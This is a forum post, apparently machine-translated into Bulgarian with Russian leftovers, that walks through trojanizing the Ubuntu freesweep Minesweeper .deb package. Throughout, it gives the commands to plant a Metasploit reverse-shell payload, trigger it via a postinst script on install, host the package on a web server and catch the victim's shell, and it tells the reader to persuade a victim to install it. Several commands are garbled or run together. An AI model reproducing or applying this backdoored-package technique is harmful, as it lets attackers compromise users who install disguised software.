Създаване на троянски кон за Linux, проучване на Ru-Sphere Protection и обсъждане на ИТ сигурността
Кой преглежда това съдържание: "Тема" (Общо потребители: 0; гости: 1)
Имайте предвид, че това нещо може или не може да работи. Защо ? Защото е Linux! ;)
И така, за да демонстрираме, че атаките от страна на клиента съществуват не само в Windows, ще използваме Metasploit, за да създадем пакет Ubuntu deb, за да получим обвивка на Linux.
Какво ще направи троянският кон:
Троянецът е Linux игра, след като жертвата се инсталира и започне да играе изтеглената игра, ще получим Shell! ;)
Първо трябва да изтеглим пакета, който ще "заразим" и да го преместим във временна работна директория. В нашия пример ще използваме пакета freesweep, текстовата версия на Mine Sweeper.
Нека създадем троянски кон:
Въведете следните команди през конзолата:
1)Команда:root@bt4:/pentest/exploits/framework3# apt-get --download-only install freeswee
Отговор:Четене на списъци с пакети. ГотовоИзграждане на дърво на зависимоститеЧетене на информация за състоянието. Готово. изрезка.
2)Сега преместете пакета във временната директория със следните команди:
root@bt4:/pentest/exploits/framework3# mkdir /tmp/evilroot@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evilroot@bt4:/ pentest/exploits /framework3# cd /tmp/evil/root@bt4:/tmp/evil#
3)След това трябва да извлечем пакета в работна директория и да създадем директория DEBIAN, за да добавим нашите допълнителни „функции“.
root @v -bt4-pre :/tmp /evil #dpkg -xfreesweep _0.90-1_i 386.debworkroot@v-bt4-pre:/tmp/evil# mkdir работа/DEBIAN
4)В директории «DEBIAN», създайте файл с името «control», който съдържа следното:
root@bt4:/tmp/evil/work/DEBIAN# cat controlПакет: freesweepВерсия: 0.90-1Раздел: Игри и развлеченияПриоритет: по изборАрхитектура: i386Поддържащ: Разработчици на Ubuntu MOTU ([email protected])Описание: базиран на текст миночистачFreesweep е реализация на популярната игра миночистач, къдеточовек се опитва да намери всички мини, без да запали никоя, въз основа на дадени съветиот компютъра. За разлика от повечето реализации на тази игра, Freesweepработи във всеки визуален текстов дисплей - в Linux конзола, в xterm и вповечето текстови терминали, които се използват в момента.
5)Нам също така е необходимо да създадете след инсталационния скрипт, който да изпълнява правата на нашите бинарни файлове. В директории «DEBIAN», създадохме файл с име «postinst», който съдържа следното:
root@bt4:/tmp/evil/work/DEBIAN# cat postinst#!/bin/shsudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
6)Теперь създавам наше вредоносное съдържание. Ние ще използваме revers-shell bék-коннекта за свързване към нашата машина под името «freesweep_резултати»:
Команда:root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcpLHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
7)След това нека направим слединсталационния скрипт изпълним и да изградим нашия нов пакет. Пакетният файл ще бъде наречен "work.deb". Нека променим името му на freesweep.deb и копираме пакета в основната директория на нашия уеб сървър.
Команди:root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinstroot@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
Отговор:dpkg-deb: изграждане на пакет `freesweep' в `/tmp/evil/work.deb'.
Команди:root@bt4:/tmp/evil# mv work.deb freesweep.debroot@bt4:/tmp/evil# cp freesweep.deb /var/www/
Като цяло вече всичко е как се използва:
1) Първо стартирайте уеб сървъра на Apache:
root@bt4:/tmp/evil# /etc/init.d/apache2 начало
2)Стартирайте мулти/обработващия модул Metasploit, за да изчакате входяща връзка:
Команда:root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E
Отговор:[*] Моля, изчакайте, докато заредим дървото на модула.[*] Обвързване на манипулатора към LHOST 0.0.0.0[*] Стартиран обратен манипулатор[*] Стартиране на манипулатора на полезния товар.
3)Нашата жертва на Ubuntu, трябва да го убедим да изтегли и инсталира deb пакета с новата игра:
Можете да го инсталирате на компютъра на жертвата, например, въведете командите:
$ sudo dpkg -i freesweep.deb
4)След като жертвата инсталира и започне да играе изтеглената игра, ще получим shell:
[*] Етап на изпращане (36 байта)[*] Сесия на командната обвивка 1 е отворена (192.168.1.101:443 -> 192.168.1.175:1129)ifconfigeth1 Link encap:Ethernet HWaddr 00: 0C:29: C2:E7:E6inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1RX pack ets:49 грешки:0 отпаднали :0 превишавания:0 рамка:0TX пакети:51 грешки:0 отпаднали:0 превишавания:0 превозвач:0сблъсъци:0 txqueuelen:1000RX байтове:43230 (42,2 KiB) TX байтове:4603 (4,4 Ki B)Прекъсване: 17 Базов адрес:0x1400. snip.име на хостubuntuidu >